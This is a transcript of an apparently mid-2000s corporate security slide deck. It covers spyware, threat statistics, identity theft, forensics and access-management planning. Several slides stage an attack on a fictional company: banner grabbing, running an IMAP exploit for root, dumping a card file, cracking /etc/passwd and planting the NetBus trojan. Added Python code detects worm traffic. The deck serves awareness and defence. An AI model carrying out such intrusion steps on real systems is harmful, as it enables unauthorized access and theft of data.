Designing a Secure Organization

Upload: lakia

Post on 19-Jan-2016

Category: Documents

DESCRIPTION

Designing a Secure Organization. Where are we today? What is the Problem? 2002-2004 Security Statistics, Common Threats, Identity Theft, Anatomy of Attack, Incident Response & Forensics, Fixing The Problem. Blended Threats: A Deadly Combination. - PowerPoint PPT Presentation

TRANSCRIPT

Page 1: Designing a Secure Organization

Designing a Secure Organization

Page 2: Designing a Secure Organization

What is the Problem?

Where are we today?
2002-2004 Security Statistics
Common Threats
Identity Theft
Anatomy of Attack
Incident Response & Forensics
Fixing The Problem

Page 3: Designing a Secure Organization

Blended Threats: A Deadly Combination

Blended threats combine hacking, DoS, and worm-like propagation

Can rapidly compromise millions of machines

Often spread without human interaction

Importance: Create confidentiality breaches, corrupt system integrity, impact availability of data and systems, compromise patient care

Klez, sadmind, BugBear, CodeRed, Nimda, Blaster

Page 4: Designing a Secure Organization

What is Spyware?

Spyware is a non-viral application (surveillance tool) that is loaded without the user’s knowledge and can monitor computer activity (Trojans), such as:
Keystroke tracking and capture
Email logging
Instant messaging usage and snapshots
Modifying application/OS behavior (e.g. CoolWebSearch)

Spyware and adware can increase business risks:
Theft of confidential data
Unauthorized enterprise access
Reduced PC performance
Increased bandwidth waste

Page 5: Designing a Secure Organization

How do People Get Infected?

Web browsing
Unauthorized downloads
File swapping
Email attachments
Instant messaging
Installing “legitimate software” (malicious mobile code)

Page 6: Designing a Secure Organization

[Chart: The Problem is Growing: Number of Spyware Reports, Dec 03, Mar 04, Apr 04, May 04*, June 04*, July 04, Aug 04, Sept 04; y-axis from 100,000 to 1,500,000. *Estimates of average monthly increase. Source: CA Security Advisory Team, Center for Pest Research]

Page 7: Designing a Secure Organization

Gartner Confirms the Spyware Threat

“At mid-2004, Gartner customers are seeing a surge in manifestations of ‘spyware,’ invasive methods to steal user privacy that disrupt users and their workstations at home and at work. Customers report that the cleanup effort may take a few hours, but that in no time at all, the same systems are infected again.”

Page 8: Designing a Secure Organization

Spyware Will Cost You Time and Money

Microsoft estimates that spyware is responsible for 50% of all PC crashes

Dell reports 20% of its technical support calls involve spyware

Sources: InformationWeek, “Tiny, Evil Things,” George Hulme and Thomas Claburn, April 26, 2004 -and-
http://www1.us.dell.com/content/topics/global.aspx/corp/pressoffice/en/2004/2004_07_20_rr_000?c=us&l=en&s=dhs&cs=19

Page 9: Designing a Secure Organization

The Effect of Spyware

(The slide arranges the four categories along a scale from System Degradation to Security Threat.)

Adware and Cookies:
Track user activity on the Internet
Collect personal information

Pop-Up Ads:
Collect information for cookies
Interrupt user transactions on the Internet
Flood users with ads and freeze machines
Install utilities that modify user services

Hijackers:
Modify content of web pages
Block access to websites
Redirect users to unintended websites
Install hidden/backdoor processes and services that are tightly bound to OS
Disrupt websites used for mission-critical applications

Spyware (Overt):
Gains a remote control capability, which includes searching and reading local files
Has a self-updating capability
Often includes a network sniffer
Can usually activate webcam or microphone
Usually logs all keystrokes

Page 10: Designing a Secure Organization

Anti-Spyware Business Drivers

Mitigate risk and limit legal liability
Protect from unauthorized access and information theft
Reduce threat to employees, partners, customers, intellectual property, regulatory compliance and brand

Help ensure business continuity
Maintain employee productivity
Avoid business disruptions and system downtime
Reduce bandwidth waste

Reduce costs
Lack of resources to research new threats
Minimize help desk calls due to spyware infestation
Costly impact of spyware infested machines (time and money)

Page 11: Designing a Secure Organization

Anti-Spyware Complements Traditional Methods

Traditional methods: Viruses, Worms, Trojans; Hack in Progress, Routed Attack, Port Scan; Buffer Overflows, IE Exploits, Outlook Exploits

Anti-spyware: Spyware, Adware, Hacker Tools, Distributed Denial-of-Service, Zombies, Keyloggers, Trojans

Page 12: Designing a Secure Organization

Security Statistics

General Internet attack trends are showing a 64% annual rate of growth (Symantec)

The average company experiences 32 cyber-attacks per week (Checkpoint)

The average measurable cost of a serious security incident in Q1/Q2 2004 was approximately $500,000 (UK Dept of Trade & Industry)

Identity theft related personal information is selling for $500-$1000 per record (CFE Resource)

Average of 79 new vulnerabilities per week in 2004!! (Eeye Digital Security)

Page 13: Designing a Secure Organization

According to the 2003 Computer Security Institute survey

90% of companies had security breaches in the past 12 months
80% acknowledged financial losses as a result
40% detected denial of service attacks
40% detected system penetration from outside
33% detected internal attack sources

The most serious and expensive losses were of proprietary information.

Yet these companies seem to be doing all the right things when it comes to information security:

90% use anti-virus software
89% use firewalls
60% use intrusion detection systems

Statistics from the FBI & Interpol on hacking:

Page 14: Designing a Secure Organization

More Security Statistics

More vulnerabilities = higher likelihood of attack
Faster attack propagation = less time to react

Initial Compromise Rate: Code Red (2001) 1.8 hosts / hour; Slammer (2003) 420 hosts / hour

Infected Pop. Doubling Time: Code Red 37 min.; Slammer 8.5 sec.

Single Host Scan Rate: Code Red 11 probes / sec.; Slammer 26,000 probes / sec.

Vulnerable Population Saturation: Code Red 24 hours; Slammer 30 minutes

Page 15: Designing a Secure Organization

A Total Novice Can be a Hacker Today

Page 16: Designing a Secure Organization

Anatomy Of Attack

Page 17: Designing a Secure Organization

Common Threats

Threats

Hackers – “Script Kiddies”
Employees – former and disgruntled
Domestic Competitors – “Competitive Intelligence”
State Sponsored & Corporate Espionage
Extremists – Earth Liberation Front (ELF)

[Images: Federal'naya Sluzhba Bezopasnosti; ELF]

Page 18: Designing a Secure Organization

Common Threats (Continued)

Physical – equipment, machinery, mines, office buildings, soft targets

Personnel – unfettered access to network-information resources, elicitation techniques, defamation of character/slander

Network/Information Assets – Network access, database and file access, web server, mail server

Page 19: Designing a Secure Organization

Anatomy of Attack: Modus Operandi

Physical Penetrations
Company Profiling – Open Source Research
Footprinting – Scanning – Enumeration – Penetration – Escalate Privilege – Stealing/Damaging Corp. information
Trojans – remote controlling systems
Buffer Overflows
Known Exploits
Port Redirection of Packets
Zone Transfers
SNMP Sweeps
Router Exploitation
Key Loggers – Software and Hardware devices
Denial of Service

Page 20: Designing a Secure Organization

Anatomy of Attack (Continued)

Physical Penetrations
Surveillance
Dumpster Diving
Impersonation of Authorized Personnel

Page 21: Designing a Secure Organization
Page 22: Designing a Secure Organization
Page 23: Designing a Secure Organization

bigwidget.net

Page 24: Designing a Secure Organization

Registrant: Big Widget, Inc. (BIGWIDGET_DOM)
1111 Big Widget Drive
Really Big, CA 90120
US

Domain Name: BIGWIDGET.NET

Administrative Contact, Technical Contact:
Simms, Haywood (HS69) [email protected]
1111 Big Widget Drive, UMIL04-07
Really Big, CA 90210
678-443-6001

Zone Contact, Billing Contact:
Dodge, Rodger (RD32) [email protected]
1111 Big Widget Drive, UMIL04-47
Really Big, CA 90210
678-443-6014

Record last updated on 24-June-2000
Record expires on 20-Mar-2010
Record created on 14-Mar-1998
Database last updated on 7-Jun-2000 15:54

Domain servers in listed order:

EHECATL.BIGWIDGET.NET 10.1.1.53
NS1-AUTH.SPRINTLINK.NET 206.228.179.10
NS.COMMANDCORP.COM 130.205.70.10

Page 25: Designing a Secure Organization

~$ telnet mail.bigwidget.net 25
Trying 10.1.1.10 ...
Connected to mail.bigwidget.net
Escape character is '^]'.
Connection closed by foreign host.
hacker:~$

hacker:~$ telnet mail.bigwidget.net 143
Trying 10.1.1.10...
Connected to mail.bigwidget.net.
* OK bigwidget IMAP4rev1 Service 9.0(157) at Wed, 14 Oct 1998 11:51:50 -0400 (EDT) (Report problems in this server to [email protected])
. logout
* BYE bigwidget IMAP4rev1 server terminating connection
. OK LOGOUT completed
Connection closed by foreign host.

Page 26: Designing a Secure Organization
Page 27: Designing a Secure Organization

hacker ~$ ./imap_exploit mail.bigwidget.com
IMAP Exploit for Linux.
Author: Akylonius ([email protected])
Modifications: p1 ([email protected])
Completed successfully.

hacker ~$ telnet mail.bigwidget.com
Trying 10.1.1.10...
Connected to mail.bigwidget.com.
Red Hat Linux release 4.2 (Biltmore)
Kernel 2.0.35 on an i686
login: root

bigwidget:~# whoami
root

bigwidget:~# cd /etc
bigwidget:~# cat ./hosts
127.0.0.1 localhost localhost.localdomain
10.1.1.9 thevault accounting
10.1.1.11 fasttalk sales
10.1.1.12 geekspeak engineering
10.1.1.13 people human resources
10.1.1.14 thelinks marketing
10.1.1.15 thesource information systems

Page 28: Designing a Secure Organization

bigwidget:~# cd /data/creditcards
bigwidget:~# cat visa.txt
Allan B. Smith 6543-2223-1209-4002 12/99
Donna D. Smith 6543-4133-0632-4572 06/98
Jim Smith 6543-2344-1523-5522 01/01
Joseph L. Smith 6543-2356-1882-7532 04/02
Kay L. Smith 6543-2398-1972-4532 06/03
Mary Ann Smith 6543-8933-1332-4222 05/01
Robert F. Smith 6543-0133-5232-3332 05/99

bigwidget:~# crack /etc/passwd
Cracking /etc/passwd...
username: bobman password: nambob
username: jsmith password: redbirds
username: root password:

bigwidget:~# ftp thesource
Connected to thesource
220 thesource Microsoft FTP Service (Version 4.0).
Name: jsmith
331 Password required for jsmith.
Password: ********
230 User jsmith logged in.
Remote system type is Windows_NT.

Page 29: Designing a Secure Organization
Page 30: Designing a Secure Organization

ftp> cd \temp
250 CDW command successful.
ftp> send netbus.exe
local: netbus.exe remote: netbus.exe
200 PORT command successful.
150 Opening BINARY mode data connection for netbus.exe
226 Transfer complete.
ftp> quit

thevault:~$ telnet thesource
Trying 10.1.1.15...
Connected to thesource.bigwidget.com.
Escape character is '^]'.
Microsoft (R) Windows 2000
Welcome to MS Telnet Service
Telnet Server Build 5.00.98217.1
login: jsmith
password: ********
*===============================================================
Welcome to Microsoft Telnet Server.
*===============================================================
C:\> cd \temp
C:\TEMP> netbus.exe

Page 31: Designing a Secure Organization

Connected to the.source.bigwidget.com

NetBus 1.6, by cf

Screendump

Postmaster < [email protected] >

[email protected]; [email protected]

Greetings < URGENT >

Greetings Bigwidget employees:

I have officially compromised your entire system, and have obtained all of your accounting information.

Yours Truly,

Friendly Hacker

David Smith

Page 32: Designing a Secure Organization

[Diagram: attack path through Router, Firewall, Web server and Clients & Workstations, labelled imap, FTP and NetBus]

Anatomy of Attack (Continued)

Page 33: Designing a Secure Organization

Anatomy of Attack (Continued)

Malicious Code

W32.Blaster.Worm

W32.Blaster.Worm is a worm that exploits the DCOM RPC vulnerability using TCP port 135.

Payload Trigger: If the date is the 16th of the month until the end of that month if it's before August, and every day from August 16 until December 31.

Payload:
Performs Denial of Service against windowsupdate.com
Causes system instability: May cause machines to crash.
Compromises security settings: Opens a hidden remote cmd.exe shell.

W32.Welchia.Worm

Attempts to download the DCOM RPC patch from Microsoft's Windows Update Web site, install it, and then reboot the computer.
Checks for active machines to infect by sending an ICMP echo request, or PING, which will result in increased ICMP traffic.
Attempts to remove W32.Blaster.Worm

Payload:
Deletes files: Deletes msblast.exe.
Causes system instability: Vulnerable Windows 2000 machines will experience system instability due to the RPC service crash.
Compromises security settings: Installs a TFTP server on all the infected machines
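Both worms described on this slide leave network-level traces a defender can watch for: Blaster-style spreading shows as one source touching many hosts on TCP port 135, and Welchia's host discovery shows as a burst of ICMP echo requests from one source. The following is an added example, not from the presentation: a small detector in Python run over a constructed, simplified firewall log. The record layout (ISO timestamp, source, destination, protocol, then the TCP port or ICMP type), the thresholds and every address are assumptions for the demo; real firewall formats differ, and the thresholds must be tuned to the network's normal RPC and monitoring traffic.

```python
"""Detection sketch for the Blaster/Welchia traffic patterns described above.

Added example, not part of the original presentation.  It runs over a
constructed, simplified firewall log with one record per line:
'<ISO timestamp> <src> <dst> <proto> <tcp-port-or-icmp-type>'.
The field layout, thresholds and sample addresses are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Tunable thresholds (assumptions): distinct destinations one source may
# touch inside one window before we alert.  Blaster probes TCP/135 on many
# hosts; Welchia sweeps with ICMP echo requests (type 8) before infecting.
WINDOW = timedelta(seconds=60)
THRESHOLDS = {"tcp135_scan": 20, "icmp_echo_sweep": 50}


def parse_line(line):
    """Split one constructed log record into a dict."""
    ts, src, dst, proto, last = line.split()
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
            "proto": proto.lower(), "num": int(last)}


def classify(rec):
    """Map a record to the worm behaviour it could belong to, or None."""
    if rec["proto"] == "tcp" and rec["num"] == 135:
        return "tcp135_scan"
    if rec["proto"] == "icmp" and rec["num"] == 8:
        return "icmp_echo_sweep"
    return None


def detect(lines):
    """Return sorted (src, behaviour, peak_distinct_dst) tuples for every
    source whose distinct-destination count inside some WINDOW meets the
    threshold.  Counting distinct hosts, not packets, keeps a chatty but
    legitimate RPC client from tripping the rule."""
    events = defaultdict(list)  # (src, behaviour) -> [(ts, dst), ...]
    for line in lines:
        rec = parse_line(line)
        kind = classify(rec)
        if kind:
            events[(rec["src"], kind)].append((rec["ts"], rec["dst"]))
    alerts = []
    for (src, kind), hits in events.items():
        hits.sort()
        start, peak = 0, 0
        for end in range(len(hits)):
            # advance the window start until hits[start:end+1] fits in WINDOW
            while hits[end][0] - hits[start][0] > WINDOW:
                start += 1
            peak = max(peak, len({dst for _, dst in hits[start:end + 1]}))
        if peak >= THRESHOLDS[kind]:
            alerts.append((src, kind, peak))
    return sorted(alerts)


def sample_log():
    """Constructed sample firewall log (not captured traffic)."""
    t0 = datetime(2003, 8, 12, 9, 0, 0)

    def rec(delta, src, dst, proto, num):
        return f"{(t0 + delta).isoformat()} {src} {dst} {proto} {num}"

    lines = []
    # Blaster-like: one host probing 25 distinct targets on TCP/135 in 25 s
    lines += [rec(timedelta(seconds=i), "10.1.1.11", f"10.1.2.{i + 1}", "tcp", 135)
              for i in range(25)]
    # Welchia-like: ICMP echo sweep of 60 hosts in 12 s
    lines += [rec(timedelta(seconds=i // 5), "10.1.1.12", f"10.1.3.{i + 1}", "icmp", 8)
              for i in range(60)]
    # Benign: admin workstation using RPC against three servers over an hour
    lines += [rec(timedelta(minutes=20 * i), "10.1.1.13", f"10.1.1.{9 + i}", "tcp", 135)
              for i in range(3)]
    # Benign: monitoring host pinging five servers
    lines += [rec(timedelta(seconds=i), "10.1.1.15", f"10.1.1.{20 + i}", "icmp", 8)
              for i in range(5)]
    return lines


if __name__ == "__main__":
    for src, kind, peak in detect(sample_log()):
        print(f"ALERT {src}: {kind} ({peak} distinct hosts within {WINDOW})")
```

Run as a script, the block reports the scanning host and the sweeping host from the constructed log and stays silent on the RPC client and the monitoring box, because the rule counts distinct destinations inside a time window rather than raw packet counts. On a real network the same per-source, per-window counting is what a firewall or NetFlow collector would feed into an alerting rule.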

Page 34: Designing a Secure Organization

Nmap

Nmap (Network Scanner) is an open source, freely distributed port scanner.
Designed to scan large networks rapidly.
Can be used to target specific services.
Includes features to evade Intrusion Detection.
Utilizes TCP/IP fingerprinting for remote host identification.

Anatomy of Attack (Continued)

Page 35: Designing a Secure Organization

Netcat – “The TCP/IP Swiss Army Knife”

Create outbound or receive inbound TCP or UDP connections
Feature-rich network debugging and “exploration” tool
Port Scanning
Remote “backdoor” shell
SYN Bombing – Denial of Service Attacks
Cryptcat - Can encrypt traffic using twofish encryption

Anatomy of Attack (Continued)

Page 36: Designing a Secure Organization

Wireless Tools

Wireless network discovering and auditing tool
Decodes traffic to provide information about the network
Interfaces with GPS to track locations of discovered networks

Wireless network discovery
Displays and tracks information about wireless networks
Runs on Microsoft Windows

Wireless tool that recovers wireless encryption Key
Monitors wireless traffic passively

Anatomy of Attack (Continued)

Page 37: Designing a Secure Organization

Trojans

Back Orifice – A powerful “Network Administrator” tool that is small in size, extensible, and free from CDC.
Keystroke Logger
Registry Editing
Redirection of TCP/IP connections
File Transfers

Sub-Seven – An extremely dangerous Trojan that enables full control of host
Erase harddrives
Execute programs

Anatomy of Attack (Continued)

Page 38: Designing a Secure Organization

L0phtCrack

Security experts from industry, government, and academia cite weak passwords as one of the most critical internet security threats.

L0phtCrack can obtain 18% of the passwords within 10 minutes in a recent demonstration.

90% of the passwords were recovered within 48 hours on a Pentium II/300

LC3 can even sniff encrypted passwords from the challenge/response exchanged when one machine authenticates to another over the network.

Anatomy of Attack (Continued)

Page 39: Designing a Secure Organization

Tools Used during Attacks

In addition to numerous handbooks & tutorials:

NetBus; UltraScan; WinFinger; SATAN; SAINT; Winnuke; Back Orifice; NMAP

[Screenshot: Connected to www.test.com]

Anatomy of Attack (Continued)

Page 40: Designing a Secure Organization

Man Charged with Using Internet to Steal Millions from Oprah, Spielberg, and Others

NEW YORK, March 20 — A Brooklyn man has been charged with stealing millions from the rich and famous through the Internet, apparently using a public library computer to help him pull off the heist.

Abraham Abdallah, 32, shown here in a police photo released March 20, allegedly masterminded the theft of identities by using computers in a Brooklyn library to obtain credit records of chief executives. (NYPD/Reuters)

Page 41: Designing a Secure Organization

Identity Theft

Page 42: Designing a Secure Organization

Personal Information

Name
Address
Telephone number
Date of birth
Driver’s license #
Identification card #
Social Security #
Bank account #
Utility account #
Medical Record #
Credit card #
Cell phone/pager #
Internet address

Page 43: Designing a Secure Organization

Just the facts…

Types of identity theft fraud

Credit card – 42%
Telephone or utility – 20%
Bank – 13%
Employment related – 9%
Loans – 7%
Government documents/benefits – 6%
Medical Records – 19%
Attempted – 10%

Page 44: Designing a Secure Organization

How Does Identity Theft Happen? Discovery…

• Applying for a loan/refinance/credit cards
• Sign-in Rosters
• Canadian/Netherlands Lottery: “You Have WON”
• Free Credit Report Emails
• Email chain letters/pyramid schemes
• “Find out everything on anyone”
• Questionnaires
• Account Verification
• Résumés – Social Security numbers/DOB

Page 45: Designing a Secure Organization

Specific Warnings…

EBAY AND PAYPAL ACCT. VERIFICATION SCAMS, July 18, 2003
Do not respond to emails from E-Bay or PayPal that ask for credit information, SSN and other personal data. ITRC is aware that many of these are scams and the country is being blanketed with them currently.

FTC WARNING—DO NOT CALL REGISTRY, confirmed May 9, 2003
Companies and websites have been making deceptive claims that they can register consumers in advance for the FTC's do-not-call list. Two are being sued by the FTC at this time. These sites include: Free-Do-Not-Call-List.org and National-Do-Not-Call-List.us. Neither of these are official governmental sites. One of them is even charging a service fee.

Unauthorized "hospital personnel" asking for info, Sept. 2003
There are some scam artists posing as hospital employees (and we can assume this goes on in nursing homes) asking patients to either verify information or to help fill in some blanks. They carry clipboards and may even wear hospital or lab coats. Hospital personnel must be on the lookout for these con artists and patients (and family members) must require identification prior to giving out any information.

Page 46: Designing a Secure Organization

Who to contact…

Credit card companies
Bank
Insurance Companies
Medical Providers (Hospitals, Dental Offices)
Social security
Department of Motor Vehicles
Utility company
ID Theft Clearinghouse

Page 47: Designing a Secure Organization

Prevention…

Shred any document that contains personal information

Shred unused credit solicitations

Request and review your credit report on a regular basis

NEVER give out personal information unless you initiate the process

Carefully read documents and question the use of your personal information

Page 48: Designing a Secure Organization

Incident Response

&

Forensic Investigations

Page 49: Designing a Secure Organization

RCCEEG is an organization of law enforcement officers, prosecutors and computer professionals from regional and surrounding counties, dedicated to providing manpower, technical and legal assistance in computer crime education and investigations.

NIPC - Detect, deter, assess, warn, respond, and investigate unlawful acts involving computer and information technologies and unlawful acts, both physical and cyber, that threaten or target our critical infrastructures

FBI Cyber Crime Division - The FBI's Cyber Crime Division is responsible for criminal investigations of intellectual property, high tech and computer crimes.

Incident Response & Forensic Investigations

Page 50: Designing a Secure Organization

“B”, “Ramon Garcia”, “Jim Baker”, “G. Robertson”, “Mr. Diamonds”

Searched investigative database

Hacked into the FBI’s top Russian Counterintelligence Chief’s computer – Caught, but said it was to show the vulnerability of the computer systems

27 year veteran with FBI

Involved in some of the most important counterintelligence cases in recent times

FBI Agent Robert P. Hanssen

Incident Response & Forensic Investigations

Page 51: Designing a Secure Organization

He did multiple U-turns - Counter surveillance

Had hand-held GPS for finding drop or signal sites

As of Feb 2001 had consumer debts of $53,000

Brian P. Regan, AF MSG ( R )

20-year military career at the National Reconnaissance Office

Daily access to Intelink

Arrested at Dulles International Airport as he was about to board a flight for Switzerland via Germany

Country A, which sources said was Libya

Less than a month before his Aug. 30, 2000, retirement from the Air Force, Regan established an e-mail address under a pseudonym -- Steven Jacobs of Alexandria -- which he planned to use for surreptitious contacts with foreign governments, according to the FBI affidavit

Created a cache of classified documents, files, and diskettes.

Incident Response & Forensic Investigations

Page 52: Designing a Secure Organization

Incident Response & Forensic Investigations

Ahmed Fathy Mehalba, a former soldier who failed to graduate from Fort Huachuca and a naturalized U.S. citizen of Egyptian descent, was taken into custody Monday at Boston's Logan International Airport. The inspectors found 132 CD-ROMs, some containing classified documents.

During the interview, Mehalba admitted that his uncle was an Intelligence Officer for the Egyptian army.

U.S. Southern Command officials said Mehalba had been employed at the facility as a contractor for The Titan Corporation, a U.S. contractor in San Diego that supports homeland security and counterterrorism.

Page 53: Designing a Secure Organization

[Diagram: Corporate Network with a DMZ (E-mail, File Transfer, HTTP) behind a Router; internal segments for Human Resources, Marketing, Engineering and Manufacturing; a Wireless AP; External Threat and Internal Threat indicated]

Incident Response & Forensic Investigations

Page 54: Designing a Secure Organization

Process of collecting, correlating, and analyzing data and content moving through a network

N-gram analysis is used to determine relationships between like types of information such as SMTP, JPEG, HTTP, and GIF.

eTrust Network Forensics

Incident Response & Forensic Investigations
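Byte-trigram profiling of captured content, as an added illustration of the n-gram idea the slide describes. This is not eTrust or Computer Associates code; every training sample and label below is constructed for the example, and the coverage score is a deliberately simple stand-in for whatever similarity measure the product used.

```python
"""Byte-trigram content-type profiling for captured network payloads.
Added example, not product code; all samples below are constructed."""
from collections import Counter

N = 3  # n-gram length; 3 separates text protocols far better than 2


def ngrams(data: bytes, n: int = N) -> Counter:
    """Count every n-byte window of the payload."""
    return Counter(data[i:i + n] for i in range(len(data) - n + 1))


# Constructed training samples, one per content type the slide names.
TRAINING = {
    "http": b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
            b"User-Agent: curl/7.0\r\nAccept: */*\r\nContent-Length: 0\r\n\r\n",
    "smtp": b"220 mail.example.com ESMTP ready\r\nEHLO client.example.com\r\n"
            b"250 OK\r\nMAIL FROM:<alice@example.com>\r\n250 OK\r\n"
            b"RCPT TO:<bob@example.com>\r\n250 OK\r\nDATA\r\n",
    "gif":  b"GIF89a\x10\x00\x10\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00"
            b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x10\x00\x10\x00"
            b"\x00\x02\x02D\x01\x00;",
    "jpeg": b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00H\x00H\x00\x00"
            b"\xff\xdb\x00C\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07\x07\x09",
}

# One profile per type: the set of trigrams seen in its training sample.
PROFILES = {label: set(ngrams(sample)) for label, sample in TRAINING.items()}


def coverage(sample: bytes, profile: set) -> float:
    """Fraction of the sample's distinct trigrams that appear in a profile."""
    grams = set(ngrams(sample))
    return len(grams & profile) / len(grams) if grams else 0.0


def classify(sample: bytes, threshold: float = 0.2) -> str:
    """Label a payload by its best-covering profile, or 'unknown' when
    nothing in the training set resembles it (e.g. an encrypted stream)."""
    scores = {label: coverage(sample, p) for label, p in PROFILES.items()}
    best = max(scores, key=scores.get)
    return best if scores[best] >= threshold else "unknown"
```

Because the score ignores port numbers and headers, a payload that looks like a GIF but was captured on a mail session is still labelled "gif", which is the mismatch a network-forensics tool flags for review.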

Page 55: Designing a Secure Organization

EnCase: Award winning and validated by the courts, EnCase allows law enforcement and IT professionals to conduct a powerful, yet completely non-invasive computer forensic investigation.

Reads the Dynamic Disk partition structure and resolves all of the possible configurations.

Incident Response & Forensic Investigations

Page 56: Designing a Secure Organization

Diagram of the investigation record set (labels only):

Report of Investigation (ROI): Date; Subject: LASTNAME, Firstname, City, State

Investigative Memorandum for Record (IMFR2): Date; Subject: LASTNAME, Firstname, City, State

Investigative Memorandum for Record (IMFR1): Date; Subject: LASTNAME, Firstname, City, State

Incident Response & Forensic Investigations

Page 57: Designing a Secure Organization

Key Success Factors

Limited Knowledge – Need to Know

Trained Professionals – Technical & Investigations

Proper Evidence Handling

Liaison with Local and Federal Law Enforcement

Civil vs. Criminal Actions

Incident Response & Forensic Investigations

Page 58: Designing a Secure Organization

Fixing The Problem

Page 59: Designing a Secure Organization

Security Architecture Capabilities

16 Distinct Client Capabilities can be Assessed, Architected, Integrated, and Monitored:

• Security Sponsorship
• Security Strategy
• Security Function Structure
• Security Function Resources and Skillset
• Security Policies, Standards, Guidelines, and Procedures
• Security Operations
• Security Monitoring
• User Management
• User Awareness
• Application Security
• Database and Metadata Security
• Host Security
• Internal Network Security
• Network Perimeter Security
• Physical and Environmental Security
• Contingency Planning

Page 60: Designing a Secure Organization

Enterprise Security Model

Page 61: Designing a Secure Organization

Regulatory Environment

UK: Personal Information Protection and Electronic Documents Act (2001)

US: HIPAA (Health Insurance Portability Accountability Act)

US: Gramm Leach Bliley (GLBA)

US: California: SB 1386 – mandates public disclosure of computer-security breaches in which confidential information may have been compromised. Becomes active on July 1, 2003.

EU: European Data Directive 95/46/EC

UK: Data Protection Act of 1998

http://www.privacyinternational.org/countries/index.html

Page 62: Designing a Secure Organization

Privacy is a Patchwork Quilt... Each law is but One of the Patches

Patches shown in the diagram:

• Fair Credit Reporting Act of 1970
• Privacy Act of 1974
• Right to Financial Privacy Act of 1978
• Electronic Communications Privacy Act of 1986
• 50 State laws
• FTC oversight
• European Privacy Directive
• Financial Services Modernization Act of 1999 (Gramm-Leach-Bliley)

Recent legislation (more patches):

• Anti-spam bill (Unsolicited Commercial Electronic Mail Act of 2000)
• The Privacy Policy Enforcement in Bankruptcy Act of 2000
• Delahunt and Bachus's bill (July 2000)
• Cantwell Legislation (July 2004)

Page 63: Designing a Secure Organization

Current State (IAM diagram; only its labels survive extraction)

Systems: Distributed Apps, Sun One Dir, Mainframe (ACF2), Oracle, MS SQL, MS Active Dir, Enterprise Apps, Email, Novell eDir, Unix HPUX, External LDAP Ser…, Web Apps, Payroll, Intranet, Division Apps

People and roles: USER, Info Sec, IT Admins, Helpdesk, Approving Manager (Access Needs; Password & Profile Management)

Functions: Audit & Reporting, Provisioning, Access Management

• Multiple Logins & Passwords
• Multiple administrative contacts and processes
• Multiple profiles to manage
• Applications provisioned one at a time
• Slow, costly, insecure On-boarding & Off-boarding
• Access changes handled one at a time by platform-specific admins
• No single view of user access & activities
• Limited means to assess and report security posture

Outcome: Higher IAM Management Cost, Complex Compliance Environment, Higher Risk, Lower Productivity, Lower Quality of Service

Page 64: Designing a Secure Organization

Access Control (build-up diagram across slides 64-73; only its labels survive extraction)

Slide 64: three application stacks, each drawn as App / DB / OS layers.

Page 65: Designing a Secure Organization

Access Control: adds a Policy Engine above the App / DB / OS stacks.

Page 66: Designing a Secure Organization

Access Control: adds a GUI for the Policy Engine.

Page 67: Designing a Secure Organization

Access Control: the GUI becomes a Web GUI.

Page 68: Designing a Secure Organization

Access Control: adds an HR System.

Page 69: Designing a Secure Organization

Access Control: adds an Authentication Service.

Page 70: Designing a Secure Organization

Access Control: link lines are drawn from the central services to every App / DB / OS layer.

Page 71: Designing a Secure Organization

Access Control: adds an Audit/Command Center.

Page 72: Designing a Secure Organization

Access Control: adds "Enhance OS" on each stack.

Page 73: Designing a Secure Organization

Access Control: adds a Forensics Repository. Final diagram: HR System, Policy Engine, Audit/Command Center, Authentication Service, Web GUI, Enhanced OS on each App / DB / OS stack, Forensics Repository.

Page 74: Designing a Secure Organization

IAM Future State (diagram; only its labels survive extraction)

Systems: Distributed Apps, Sun One Dir, Mainframe (ACF2), Oracle, MS SQL, MS Active Dir, Enterprise Apps, Email, Novell eDir, Unix HPUX, External LDAP Ser…, Web Apps, Payroll, Intranet, Division Apps

People and roles: USER, Info Sec, IT Admins, Helpdesk, Approving Manager (Access Needs; Password & Profile Management)

IAM Shared Services Infrastructure:

• Access Control: Policy Store, User Store
• Provisioning: Engine, Workflow, Directory
• Audit & Reporting: Engine, Data Store
• Self-Service Password & Profile Management
• Access Management

Outcome: Improved Productivity & User Satisfaction, Improved Operational Efficiency, Reduced Administrative Cost, Improved Compliance, Reduced Overall Risk

Page 75: Designing a Secure Organization

What are the immediate steps today?

Commitment to Proceed

• Executive level sponsorship of Enterprise Security Program
• Establish Information Security Office
• Commit budget for FY 2003-2005

Enterprise Security Program should be implemented as an enterprise initiative to ensure project success

Page 76: Designing a Secure Organization

What are the short term steps?

Mitigate Risks

• Implement Information Security Policies Infrastructure
• Implement Security Monitoring Tools

Demonstrate Commitment

• Establish Enterprise Security Program Office
• Commit Budget and Resources for Enterprise Security Program

Page 77: Designing a Secure Organization

What are the long term steps?

Roadmap diagram: Initiate Enterprise Security Program, then Complete Baseline Capabilities, Complete Service Capabilities, Complete Enabling Capabilities

Maturation of Enterprise Security Capabilities

1. Baseline Capabilities – formalize core capabilities to mitigate enterprise information security risks

2. Service Capabilities – deliver security services to support business requirements and end users

3. Enabling Capabilities – deploy security capabilities to enable business strategies

Page 78: Designing a Secure Organization

5 Initiatives of an Enterprise Security Architecture

1. Assessment Of Existing Security Environment

Development of an effective enterprise security architecture must begin with an analysis of the effectiveness of existing security controls.

2. Development Of A Security Architecture That Supports Business Objectives

Understand business objectives and strategy, and develop an end-state vision of the way in which security will support and enable those objectives.

3. Development Of An Enterprise-Wide Security Architecture That Supports Business Strategy

Define the end-state architecture, including the integration and deployment across the enterprise of structural, procedural, knowledge, technology or support focused security initiatives consistent with the business vision.

Page 79: Designing a Secure Organization

5 Initiatives of an Enterprise Security Architecture (cont.)

4. Development Of A Security Program That Maintains A High Security Posture

Establish design principles and standards and transfer knowledge to enable the continued integrity of the security architecture as it evolves with new technologies and threats to information assets over time.

5. Identify An Appropriate Security Migration Strategy

Plan the transition from the current environment to the end-state architecture.

Page 80: Designing a Secure Organization

Implementation Approach Comparison

                     Piece Meal Implementation    Enterprise Implementation
• Total Cost         $8,429                       $7,761
• Expense Cost       $4,079                       $194
• Capital Cost       $4,350                       $7,567
• Discount           15%                          25%
• Completion         Year 2005                    Year 2003
